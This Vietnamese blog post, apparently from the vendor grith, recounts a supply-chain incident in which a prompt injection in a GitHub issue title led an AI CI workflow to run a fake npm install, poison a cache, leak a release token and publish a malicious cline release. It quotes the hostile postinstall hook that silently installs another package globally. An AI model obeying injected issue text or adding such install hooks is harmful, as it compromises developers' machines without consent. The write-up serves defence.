grith - Một Vấn Đề trên GitHub Ảnh Hưởng Đến 4.000 Máy Tính Lập Trình Viên
Vào ngày 17 tháng 2 năm 2026, cline@2.3.0 được phát hành trên npm, chứa một thay đổi:
"postinstall": "npm install -g openclaw@latest"Trong vòng 8 giờ, bản cập nhật này đã cài đặt OpenClaw trên 4.000 máy mà không có sự đồng ý. Tuy nhiên, điều đáng chú ý là cách kẻ tấn công lấy được token npm: bằng cách tiêm lệnh vào tiêu đề của một vấn đề GitHub.
Chuỗi Tấn Công
-
Tiêm Prompt thông qua Tiêu Đề: Một workflow AI sử dụng
claude-code-actionđã bị lợi dụng bằng một tiêu đề vấn đề có chứa lệnh độc hại. -
Thực Thi Mã Lệnh: AI bot thực hiện lệnh
npm installtừ một repository giả mạo. -
Cache Poisoning: Sử dụng một script để làm nhiễm độc cache, ảnh hưởng đến workflow phát hành hàng đêm.
-
Đánh Cắp Thông Tin: Workflow bị ảnh hưởng đã đánh cắp các thông tin như
NPM_RELEASE_TOKEN. -
Public Mã Độc: Sử dụng token đánh cắp để phát hành
cline@2.3.0với một hook postinstall độc hại.
Hậu Quả và Biện Pháp Khắc Phục
Các biện pháp khắc phục bao gồm loại bỏ cache GitHub Actions khỏi các workflow xử lý thông tin và áp dụng chứng thực OIDC cho việc phát hành npm, giúp bảo vệ chống lại các tấn công tương tự trong tương lai.
Thách Thức Kiến Trúc
Vấn đề không chỉ ở chuỗi cung ứng mà còn là vấn đề an ninh của agent. Điều này tạo ra một vấn đề mới khi Tool A bị xâm nhập để cài đặt Tool B, dẫn đến một hệ quả khó kiểm soát và đánh giá.
Mỗi nhóm triển khai các agent AI trong CI/CD cần đánh giá việc tác động của agent và xem xét các biện pháp bảo vệ thích hợp.
grith được thiết kế để phát hiện và ngăn chặn loại vấn đề này với việc đánh giá các hoạt động ở tầng syscall.